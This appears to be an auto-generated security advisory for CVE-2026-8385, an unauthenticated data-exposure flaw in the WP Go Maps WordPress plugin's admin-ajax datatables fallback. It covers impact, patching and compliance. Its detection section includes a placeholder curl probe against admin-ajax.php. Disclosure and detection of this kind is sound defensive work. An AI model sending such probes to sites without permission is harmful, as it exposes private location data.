Executive Summary

The vulnerability CVE-2026-8385 affects the WP Go Maps plugin for WordPress versions prior to 10.0.10. It occurs because the plugin does not properly enforce the marker approval filter on the admin-ajax fallback for its datatables route.

This flaw allows unauthenticated visitors to retrieve marker records that the site owner has not approved for public display. These records include sensitive information such as the marker's title, category, address, and description fields.

The issue arises because the AJAX fallback mechanism bypasses the intended access controls, unlike the legitimate REST API path which correctly filters approved markers.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can lead to unauthorized disclosure of sensitive location data stored in the WP Go Maps plugin.

Unauthenticated attackers can access marker information that was not intended for public viewing, potentially exposing private or sensitive details such as titles, categories, addresses, and descriptions.

Such exposure could harm the privacy of individuals or organizations, damage reputation, or provide attackers with information useful for further attacks or social engineering.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by sending crafted requests to the admin-ajax.php endpoint of a WordPress site running the WP Go Maps plugin prior to version 10.0.10 and observing if marker records that are not approved for public display are returned.

Specifically, an unauthenticated request targeting the plugin's Datatables AJAX fallback route can be used to check if sensitive marker information such as title, category, address, and description fields are accessible without proper approval.

• Use curl or similar tools to send a request to the admin-ajax.php endpoint with parameters mimicking the Datatables AJAX fallback call.
• Example command: curl -X POST 'https://example.com/wp-admin/admin-ajax.php' --data 'action=wpdatatables&other_parameters=...' (replace with actual parameters used by the plugin's AJAX fallback).

If the response includes marker data that should be restricted, the site is vulnerable.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate step to mitigate this vulnerability is to update the WP Go Maps plugin to version 10.0.10 or later, where the issue has been patched.

Until the update can be applied, consider restricting access to the admin-ajax.php endpoint or implementing additional access controls to prevent unauthenticated requests from exploiting the Datatables AJAX fallback.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability allows unauthenticated visitors to access marker records that have not been approved for public display, including potentially sensitive information such as titles, categories, addresses, and descriptions.

This unauthorized data exposure could lead to non-compliance with data protection regulations like GDPR or HIPAA, which require proper access controls and protection of personal or sensitive information.

Since the plugin fails to enforce marker approval filters properly, it risks exposing data that should be restricted, potentially violating privacy and security requirements mandated by these standards.

Useful 0 Not Useful 0